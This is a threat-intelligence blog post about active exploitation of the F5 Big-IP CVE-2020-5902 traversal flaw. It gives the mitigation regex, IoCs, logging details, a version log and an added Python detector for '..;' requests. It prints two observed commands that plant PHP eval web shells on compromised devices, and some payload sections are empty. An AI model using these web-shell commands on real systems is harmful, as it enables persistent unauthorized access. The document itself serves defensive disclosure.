CVE-2020-5902 was disclosed on July 1st, 2020 by F5 Networks in K52145254 as a CVSS 10.0 remote code execution vulnerability in the Big-IP administrative interface. By July 3rd, 2020 NCC Group observed active exploitation. This blog is a summary of what we know as the situation develops.
About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IoCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.
The vulnerability was discovered by Positive Technologies and an associated blog post released on July 2nd, 2020. NCC Group’s RIFT established a live post on Reddit on July 3rd to collate early intelligence and raise awareness within the cyber defence and sysadmin communities.
In the F5 knowledge base article K52145254 there is the following mitigation:
```apache
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
```
This regex checks for the sequence:
```
..;
```
As such, the issue can be described as a directory traversal vulnerability. Combined with functionality native to the device, this provides the ability to access files, upload files and execute code without authentication.
The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 5th, 2020.
The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 6th, 2020.
Exploitation is varied, including access to password hashes:
As of Saturday remote code execution capabilities existed.
The first IPs we observed actively exploiting the issue were published at 17:00 UTC on July 4th, 2020 – https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2020-5902
Shortly after these initial exploit attempts, details were shared in open source.
We have as of 10:00 on July 6th, 2020 started to see staged exploitation, namely a payload of:
The full payload is:
We have as of 10:29 on July 6th, 2020 started to see a second staged exploitation, namely:
With a payload of:
IoCs for the 2nd stage are:
b8ce500c1e6ec4d4268ae0d2de82f9f35bbfc673 /tmp/demo.txt
We have as of 16:17 on July 6th, 2020 started to see a third staged exploitation, namely:
e1775079d58a6266fdd6185143642ac53b4314fe /var/log/F5-logcheck/zabbix
Another IoC for this actor is:
/tmp/cepi
Of note, this actor performed their original scans at 10:30 on July 6th, 2020 and returned ~6 hours later.
As of 16:51 on July 6th, 2020 we’ve seen our first web shell:
```shell
mount -o remount -rw /usr ; echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2NpdHJpeEBraGFycGVkYXInXSkpOz8+ | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php
```
When decoded, this appears to be a reused web shell from Citrix:
```php
<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>
```
As of 09:26 on July 7th, 2020 we’ve seen a second web shell:
```shell
mount -o remount -rw /usr ;echo 'utility<?php @eval(base64_decode($_POST["session_sK4hodQm"]));' > /usr/local/www/xui/common/scripts/utility.php;mount -o remount -r /usr
```
As of 12:30 on July 7th, 2020 we’ve seen use of a new exploit.
As the devices are load balancers, they provide the opportunity to:
There are forensic artifacts available, although the log in which they are stored is limited to 20MB and thus risks cycling quickly.
The wider HTTP log configuration differs from a default configuration.
```apache
#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here. Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.
#
#CustomLog "logs/access_log" common

#
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
CustomLog "/var/run/httpd.pipe" acc_combined
```
The configuration causes httpd to send its access log output to a pipe. This pipe ultimately goes to systemd/journalctl.
```
# grep httpd /etc/syslog-ng/syslog-ng_sysinit.conf.default
source s_httpd {
pipe("/var/run/httpd.pipe" optional(yes) perm(0660) group("apache"));
destination d_httpd_err {
file("/var/log/httpd/httpd_errors" create_dirs(yes));
source(s_httpd);
destination(d_httpd_err);
```
Other forensic artifacts include new .jsp files, or similar, used to achieve code execution.
A Sigma rule has been created and is available here. However, utilizing it requires the Big-IP logs to be sent to a SIEM, as passive network detection won’t work unless SSL/TLS can be decrypted.
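As an added example (not part of the original post, the Sigma rule, or F5's mitigation), the following Python applies the same `..;` check as the LocationMatch mitigation above to combined-format access log lines of the kind the httpd.pipe configuration emits, as a SIEM-side complement once the logs have been shipped off the device. The log lines, client addresses and .jsp names are constructed placeholders, not real traffic or BIG-IP endpoints.

```python
import re
from urllib.parse import unquote

# Same pattern as the LocationMatch mitigation in K52145254: the literal
# sequence "..;" anywhere in the request path.
TRAVERSAL_RE = re.compile(r"\.\.;")

# Combined Logfile Format, the acc_combined format the BIG-IP httpd writes
# to /var/run/httpd.pipe: client, ident, user, [time], "request", status,
# size, "referer", "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)

def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def is_traversal(path):
    """True if the request path contains '..;'. Apache logs the raw request
    line, so the path is percent-decoded first to match what the server saw."""
    return TRAVERSAL_RE.search(unquote(path)) is not None

def find_hits(lines):
    """Return (client, time, path, status) for every line whose path matches."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is not None and is_traversal(rec["path"]):
            hits.append((rec["client"], rec["time"], rec["path"], rec["status"]))
    return hits

# Constructed sample lines (not real traffic; the .jsp names are placeholders,
# not BIG-IP endpoints): two traversal attempts and one ordinary login request.
SAMPLE_LOG = [
    '203.0.113.10 - - [06/Jul/2020:10:00:01 +0000] "GET /login.jsp/..;/placeholder.jsp HTTP/1.1" 200 1587 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [06/Jul/2020:10:00:02 +0000] "GET /login.jsp HTTP/1.1" 200 4532 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [06/Jul/2020:10:00:03 +0000] "GET /login.jsp/..%3B/placeholder.jsp HTTP/1.1" 404 196 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for client, when, path, status in find_hits(SAMPLE_LOG):
        print(f"{when} {client} {status} {path}")
```

Feed it the lines syslog-ng writes from the pipe; the 404 on the third sample line is what a device with the K52145254 LocationMatch in place would record for such a request.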
July 7th, 2020 @ 13:15 – v1.15 – added new exploit
July 7th, 2020 @ 09:26 – v1.14 – added the second web shell
July 6th, 2020 @ 17:09 – v1.13 – added the first web shell
July 6th, 2020 @ 16:40 – v1.12 – added another staged payload
July 6th, 2020 @ 13:13 – v1.11 – added detection aspects and session cookie theft
July 6th, 2020 @ 10:21 – v1.10 – added staged payload
July 6th, 2020 @ 09:48 – v1.9 – added Honeypot attack volumes from this morning
July 6th, 2020 @ 09:34 – v1.8 – added fact Metasploit exploitation seen in the wild
July 6th, 2020 @ 09:00 – v1.7 – added timeline of events
July 6th, 2020 @ 05:46 – v1.6 – added Metasploit modules and other public exploits released overnight
July 5th, 2020 @ 21:22 – v1.5 – added license key theft based on honeypot data
July 5th, 2020 @ 17:34 – v1.4 – included link to fully functional exploit being shared
July 5th, 2020 @ 16:28 – v1.3 – Further clarification on log pipe consumption
July 5th, 2020 @ 16:23 – v1.2 – New journalctl output example
July 5th, 2020 @ 16:16 – v1.1 – Clarified log pipe usage
July 5th, 2020 @ 15:40 – v1.0 – Initial version